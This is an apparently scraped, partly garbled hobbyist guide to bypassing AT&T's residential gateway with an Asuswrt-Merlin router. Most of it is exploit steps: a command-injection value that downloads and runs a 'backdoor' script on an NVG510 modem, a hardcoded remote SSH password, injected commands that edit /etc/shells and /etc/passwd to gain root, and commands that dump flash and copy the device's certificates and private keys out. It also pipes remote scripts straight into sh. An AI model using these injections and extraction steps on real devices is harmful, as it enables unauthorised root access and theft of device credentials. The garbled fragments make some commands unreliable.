Using Asuswrt-Merlin to bypass AT&T's residential gateway. (rt-ac68u <--> ~BGW210~ <--> ONT)
This method only requires Asuswrt-Merlin. No pfSense, or netgraph, or ubiquiti devices, or dumb switch needed.
I only tested with rt-ac68u, but the method should work for all Asuswrt-Merlin based wireless routers (Please let me know if it doesn't).
Now, the home router connects optical network terminal(ONT) directly. You should setup the firewall wisely.
The certificates extracted from both NVG510 and NVG589 work, however NVG510 costs less and is easier to root.
Credit: earlz
python -m http.server
or python -m SimpleHTTPServer
for Python2nonce
and copy the value shown in quotes. This value changes every time the page is loaded! Example: 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02
errrr && wget http://YOUR_LOCAL_IP:8000/backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
telnet 192.168.1.254 28
. The username is admin and the password is your modem's access code written on the label of the modem!
to switch to a root shellpython -m http.server
or python -m SimpleHTTPServer
for Python2wget https://YOUR_LOCAL_IP:8000/busybox-mips -O /tmp/busybox
chmod +x /tmp/busybox
/tmp/busybox dd if=/dev/mtdblock4 of=/tmp/mfg.dat bs=1k
mkdir /tmp/images
mount -o blind /tmp/images /www/att/images
cp /tmp/mfg.dat /www/att/images
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
Credit: nomotion
ssh remotessh@192.168.1.254
(password:5SaP9I26
)
ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells
ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells
ping -c 1 192.168.1.254;sed -i 's/cshell/nsh/g' /etc/passwd
exit
and shh back ssh remotessh@192.168.1.254
(password:5SaP9I26
)!
. It switches to root shell.mount mtd:mfg -t jffs2 /mfg && cp /mfg/mfg.dat /tmp/ && umount /mfg
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
cp /tmp/mfg.dat /www/att/images
Credit: Streiw
Credit: devicelocksmith
I cannot use the build-in wpa_supplicant v0.6 in Asuswrt-Merlin to achieve my goal, so I compiled the wpa_supplicant v2.7 from Entware repository. Here I provide the necessary binary files. If you are working on a different model, you may need to compile wpa_supplicant from the source. check this.
python -m http.server
wget https://raw.githubusercontent.com/bypassrg/att/master/packages.tar.gz && tar -xzf packages.tar.gz
wget https://YOUR_LOCAL_IP:8000/EAP-TLS_8021x_XXXX.tar.gz
mkdir /jffs/EAP && tar xzf EAP-TLS_8021x_XXXX.tar.gz -C /jffs/EAP
ca_cert="/jffs/EAP/CA_XXXX.pem"
client_cert="/jffs/EAP/Client_XXXX.pem"
private_key="/jffs/EAP/PrivateKey_PKCS1_XXXX.pem"
wget -O - https://raw.githubusercontent.com/bypassrg/att/master/entware_jffs.sh |sh
uname -rm
. If you are not using armv7, you must use the correct Entware installation script. opkg update
opkg install libubox
echo -e "\ndest opt /opt" >> /opt/etc/opkg.conf
opkg install -d opt libubus_2018-10-06-221ce7e7-1_armv7-2.6.ipk
opkg install -d opt hostapd-common_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install -d opt wpa-supplicant_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install fake-hwclock
echo -e "\n/opt/usr/sbin/wpa_supplicant -s -B -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf" >> /opt/etc/init.d/rc.unslung
/opt/usr/sbin/wpa_supplicant -dd -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf
Some useful links